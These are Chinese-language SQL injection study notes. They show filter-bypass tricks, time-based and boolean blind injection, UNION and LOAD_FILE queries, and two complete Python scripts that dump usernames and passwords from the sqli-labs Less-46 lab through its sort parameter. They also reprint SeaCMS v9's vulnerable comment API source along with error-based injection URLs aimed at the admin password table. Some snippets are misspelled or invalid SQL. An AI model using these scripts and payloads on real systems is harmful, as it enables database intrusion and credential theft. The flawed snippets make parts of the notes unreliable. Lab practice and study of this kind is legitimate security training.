seacmsv9注入管理员账号密码+orderby+limi

1：mysql默认存储引擎innoDB携带的表

1，mysql.innodb_table_stats

2,mysql.innodb_index_stats

 SELECT table_name FROM mysql.innodb_table_stats WHERE database_name = DATABASE();

2： 关键字做处理

• HEX编码:0x696E666F726D6174696F6E5F736368656D61
• 字符串：concat（'informa','tion_scheam'） 
• 大小写:INforMation_Scheam

3：时间盲注

SELECT IF(ASCII(SUBSTRING(DATABASE(), 1, 1)) = 97, SLEEP(5), 0);

如果条件为真，数据库将延迟5秒才返回结果，否则立即返回。通过调整不同的字符和条件，你可以逐渐拼凑出表名（可使用python脚本破解）

4：布尔盲注（python脚本）

SELECT CASE WHEN (SELECT SUBSTRING(mysql.innodb_table_stats, 1, 1) FROM your_table LIMIT 1) = 'a' THEN 1/0 ELSE 1 END;

5：利用联合查询

SELECT id, name FROM users WHERE id = 1 UNION SELECT table_name, '' FROM your_table;

6：文件读取：

某些数据库允许从文件系统中读取文件内容，假设你想读取 /etc/passwd 文件的内容：

SELECT LOAD_FILE('/etc/passwd');

7：以靶场第46关为例子

用Boolean盲注：

• import requests

• from lxml import html

• def get_id_one(URL,paload):

• res = requests.get(url=URL,params=paload)

• tree = html.fromstring(res.content)

• id_one = tree.xpath('//table//tr[1]/td[1]/text()')[0].strip()

• return id_one

• def get_database(URL):

• # 获取数据库名称

• s = ""

• for i in range(1,10):

• low = 32

• hight = 128

• mid = (low+hight)//2

• while(hight > low):

• paload = {"sort": f"if((greatest(ascii(substr(database(),{i},1)),{mid})={mid}),id,username) -- "}#相当于第一个字符<={mid}条件判断为真

• id_one = get_id_one(URL,paload)

• if id_one=="1":

• hight = mid

• mid = (low + hight) // 2

• else:

• low = mid +1

• mid = (low + hight) // 2

• s+=chr(mid)

• print("数据库名称:"+s)

• def get_table(URL):

• # 获取表名称

• s = ""

• for i in range(1,32):

• low = 32

• hight = 128

• mid = (low+hight)//2

• while(hight > low):

• paload = {"sort": f"if((ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=\"security\"),{i},1))>{mid}),id,username) -- "}

• id_one = get_id_one(URL,paload)

• if id_one=="1":

• low = mid +1

• mid = (low + hight) // 2

• else:

• hight = mid

• mid = (low + hight) // 2

• s+=chr(mid)

• print("表的名称:"+s)

• def get_column(URL):

• # 获取管理员的字段名称

• s = ""

• for i in range(1,32):

• low = 32

• hight = 128

• mid = (low+hight)//2

• while(hight > low):

• paload = {"sort": f"if((ascii(substr((select group_concat(column_name) from information_schema.columns where table_schema=\"security\" and table_name=\"users\"),{i},1))>{mid}),id,username) -- "}

• id_one = get_id_one(URL,paload)

• if id_one=="1":

• low = mid +1

• mid = (low + hight) // 2

• else:

• hight = mid

• mid = (low + hight) // 2

• s+=chr(mid)

• print("列的名称:"+s)

• def get_result(URl):

• # 获取用户名和密码信息

• s = ""

• for i in range(1,32):

• low = 32

• hight = 128

• mid = (low+hight)//2

• while(hight > low):

• paload = {"sort": f"if((ascii(substr((select group_concat(username,0x3e,password) from users),{i},1))>{mid}),id,username) -- "}

• id_one = get_id_one(URL,paload)

• if id_one=="1":

• low = mid +1

• mid = (low + hight) // 2

• else:

• hight = mid

• mid = (low + hight) // 2

• s+=chr(mid)

• print("用户名及密码信息:"+s)

• if __name__ == '__main__':

• URL = "http://localhost/Less-46/"

• # get_database(URL)

• # get_table(URL)

• # get_column(URL)

• get_result(URL)

用时间盲注：

• import requests

• import datetime

• def get_database(URL):

• # 获取数据库名称

• s = ""

• for i in range(1,10):

• low = 32

• hight = 128

• mid = (low+hight)//2

• while(hight > low):

• paload = {"sort": f"if((greatest(ascii(substr(database(),{i},1)),{mid})={mid}),sleep(0.2),id) -- "}#相当于第一个字符<={mid}条件判断为真

• start = datetime.datetime.now()

• res = requests.get(url=URL, params=paload)

• end = datetime.datetime.now()

• if (end - start).seconds >=3:

• hight = mid

• mid = (low + hight) // 2

• else:

• low = mid +1

• mid = (low + hight) // 2

• print(chr(mid),mid)

• s+=chr(mid)

• print("数据库名称:"+s)

• def get_table(URL):

• # 获取表名称

• s = ""

• for i in range(1,32):

• low = 32

• hight = 128

• mid = (low+hight)//2

• while(hight > low):

• paload = {"sort": f"if((ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=\"security\"),{i},1))>{mid}),sleep(0.2),id) -- "}

• start = datetime.datetime.now()

• res = requests.get(url=URL, params=paload)

• end = datetime.datetime.now()

• if (end - start).seconds >=3:

• low = mid +1

• mid = (low + hight) // 2

• else:

• hight = mid

• mid = (low + hight) // 2

• s+=chr(mid)

• print("表的名称:"+s)

• def get_column(URL):

• # 获取管理员的字段名称

• s = ""

• for i in range(1,32):

• low = 32

• hight = 128

• mid = (low+hight)//2

• while(hight > low):

• paload = {"sort": f"if((ascii(substr((select group_concat(column_name) from information_schema.columns where table_schema=\"security\" and table_name=\"users\"),{i},1))>{mid}),sleep(0.2),id) -- "}

• start = datetime.datetime.now()

• res = requests.get(url=URL, params=paload)

• end = datetime.datetime.now()

• if (end - start).seconds >=3:

• low = mid +1

• mid = (low + hight) // 2

• else:

• hight = mid

• mid = (low + hight) // 2

• s+=chr(mid)

• print("列的名称:"+s)

• def get_result(URl):

• # 获取用户名和密码信息

• s = ""

• for i in range(1,32):

• low = 32

• hight = 128

• mid = (low+hight)//2

• while(hight > low):

• paload = {"sort": f"if((ascii(substr((select group_concat(username,0x3e,password) from users),{i},1))>{mid}),sleep(0.2),1) -- "}

• start = datetime.datetime.now()

• res = requests.get(url=URL, params=paload)

• end = datetime.datetime.now()

• if (end - start).seconds >=3:

• low = mid +1

• mid = (low + hight) // 2

• else:

• hight = mid

• mid = (low + hight) // 2

• s+=chr(mid)

• print("用户名及密码信息:"+s)

• if __name__ == '__main__':

• URL = "http://localhost/Less-46/"

• # get_database(URL)

• # get_table(URL)

• # get_column(URL)

• get_result(URL)

8：seacmsv9实现报错注入数据：

• <?php

• session_start();

• require_once("../../include/common.php");

• $id = (isset($gid) && is_numeric($gid)) ? $gid : 0;

• $page = (isset($page) && is_numeric($page)) ? $page : 1;

• $type = (isset($type) && is_numeric($type)) ? $type : 1;

• $pCount = 0;

• $jsoncachefile = sea_DATA."/cache/review/$type/$id.js";

• //缓存第一页的评论

• if($page<2)

• {

• if(file_exists($jsoncachefile))

• {

• $json=LoadFile($jsoncachefile);

• die($json);

• }

• }

• $h = ReadData($id,$page);

• $rlist = array();

• if($page<2)

• {

• createTextFile($h,$jsoncachefile);

• }

• die($h);

• function ReadData($id,$page)

• {

• global $type,$pCount,$rlist;

• $ret = array("","",$page,0,10,$type,$id);

• if($id>0)

• {

• $ret[0] = Readmlist($id,$page,$ret[4]);

• $ret[3] = $pCount;

• $x = implode(',',$rlist);

• if(!empty($x))

• {

• $ret[1] = Readrlist($x,1,10000);

• }

• }

• $readData = FormatJson($ret);

• return $readData;

• }

• function Readmlist($id,$page,$size)

• {

• global $dsql,$type,$pCount,$rlist;

• $ml=array();

• if($id>0)

• {

• $sqlCount = "SELECT count(*) as dd FROM sea_comment WHERE m_type=$type AND v_id=$id ORDER BY id DESC";

• $rs = $dsql ->GetOne($sqlCount);

• $pCount = ceil($rs['dd']/$size);

• $sql = "SELECT id,uid,username,dtime,reply,msg,agree,anti,pic,vote,ischeck FROM sea_comment WHERE m_type=$type AND v_id=$id ORDER BY id DESC limit ".($page-1)*$size.",$size ";

• $dsql->setQuery($sql);

• $dsql->Execute('commentmlist');

• while($row=$dsql->GetArray('commentmlist'))

• {

• $row['reply'].=ReadReplyID($id,$row['reply'],$rlist);

• $ml[]="{\"cmid\":".$row['id'].",\"uid\":".$row['uid'].",\"tmp\":\"\",\"nick\":\"".$row['username']."\",\"face\":\"\",\"star\":\"\",\"anony\":".(empty($row['username'])?1:0).",\"from\":\"".$row['username']."\",\"time\":\"".date("Y/n/j H:i:s",$row['dtime'])."\",\"reply\":\"".$row['reply']."\",\"content\":\"".$row['msg']."\",\"agree\":".$row['agree'].",\"aginst\":".$row['anti'].",\"pic\":\"".$row['pic']."\",\"vote\":\"".$row['vote']."\",\"allow\":\"".(empty($row['anti'])?0:1)."\",\"check\":\"".$row['ischeck']."\"}";

• }

• }

• $readmlist=join($ml,",");

• return $readmlist;

• }

• function Readrlist($ids,$page,$size)

• {

• global $dsql,$type;

• $rl=array();

• $sql = "SELECT id,uid,username,dtime,reply,msg,agree,anti,pic,vote,ischeck FROM sea_comment WHERE m_type=$type AND id in ($ids) ORDER BY id DESC";

• $dsql->setQuery($sql);

• $dsql->Execute('commentrlist');

• while($row=$dsql->GetArray('commentrlist'))

• {

• $rl[]="\"".$row['id']."\":{\"uid\":".$row['uid'].",\"tmp\":\"\",\"nick\":\"".$row['username']."\",\"face\":\"\",\"star\":\"\",\"anony\":".(empty($row['username'])?1:0).",\"from\":\"".$row['username']."\",\"time\":\"".$row['dtime']."\",\"reply\":\"".$row['reply']."\",\"content\":\"".$row['msg']."\",\"agree\":".$row['agree'].",\"aginst\":".$row['anti'].",\"pic\":\"".$row['pic']."\",\"vote\":\"".$row['vote']."\",\"allow\":\"".(empty($row['anti'])?0:1)."\",\"check\":\"".$row['ischeck']."\"}";

• }

• $readrlist=join($rl,",");

• return $readrlist;

• }

• function ReadReplyID($gid,$cmid,&$rlist)

• {

• global $dsql;

• if($cmid>0)

• {

• if(!in_array($cmid,$rlist))$rlist[]=$cmid;

• $row = $dsql->GetOne("SELECT reply FROM sea_comment WHERE id=$cmid limit 0,1");

• if(is_array($row))

• {

• $ReplyID = ",".$row['reply'].ReadReplyID($gid,$row['reply'],$rlist);

• }else

• {

• $ReplyID = "";

• }

• }else

• {

• $ReplyID = "";

• }

• return $ReplyID;

• }

• function FormatJson($json)

• {

• $x = "{\"mlist\":[%0%],\"rlist\":{%1%},\"page\":{\"page\":%2%,\"count\":%3%,\"size\":%4%,\"type\":%5%,\"id\":%6%}}";

• for($i=6;$i>=0;$i--)

• {

• $x=str_replace("%".$i."%",$json[$i],$x);

• }

• $formatJson = jsonescape($x);

• return $formatJson;

• }

• function jsonescape($txt)

• {

• $jsonescape=str_replace(chr(13),"",str_replace(chr(10),"",json_decode(str_replace("%u","\u",json_encode("".$txt)))));

• return $jsonescape;

• }

输入以下sql注入：

http://127.0.0.1/upload/comment/api/index.php?gid=1&page=2&rlist[]=@`', extractvalue(1, concat_ws( , \, (select user()))),@`'

但输入以下：

http://127.0.0.1/upload/comment/api/index.php?gid=1&page=2&rlist[]=@`%27`,%20extractvalue(1,%20concat_ws(0x20,%200x5c,(select%20(password)from%20sea_admin))),@`%27`

 

说明注入失败